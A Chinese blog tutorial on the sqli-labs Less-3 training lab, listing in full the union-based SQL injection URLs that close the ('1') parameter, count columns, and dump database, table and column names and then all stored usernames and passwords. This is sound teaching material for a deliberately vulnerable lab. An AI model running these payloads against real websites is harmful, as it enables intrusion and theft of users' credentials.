SQL注入基础,sqli-labs-master实战演练,number 3!

SQL注入基础,sqli-labs-master实战演练,number 3!

跟着一起敲一遍就不会想睡觉哦
第一关的id值是 ‘1’
第二关的id值是1
第三关的id值是(‘1’)

①加一个单引号一个括号再加一个注释号,返回结果为正常
http://127.0.0.1/sql/Less-3/?id=1’)–+
在这里插入图片描述

②判断多少列,第4列报错
http://127.0.0.1/sql/Less-3/?id=1’) order by 3–+

在这里插入图片描述在这里插入图片描述

③联合查询,2和3可显示出来
http://127.0.0.1/sql/Less-3/?id=-1’) union select 1,2,3–+
在这里插入图片描述

④爆出库名
http://127.0.0.1/sql/Less-3/?id=-1’) union select 1,2,group_concat(schema_name) from information_schema.schemata–+
在这里插入图片描述

⑤爆出表名
http://127.0.0.1/sql/Less-3/?id=-1’) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479–+
在这里插入图片描述

⑥爆出列名
http://127.0.0.1/sql/Less-3/?id=-1’) union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273–+
在这里插入图片描述

⑦爆出所有数据,通过~分隔
http://127.0.0.1/sql/Less-3/?id=-1’) union select 1,2,group_concat(concat_ws(0x7e,username,password)) from security.users–+
在这里插入图片描述

©️2020 CSDN 皮肤主题: 1024 设计师:上身试试 返回首页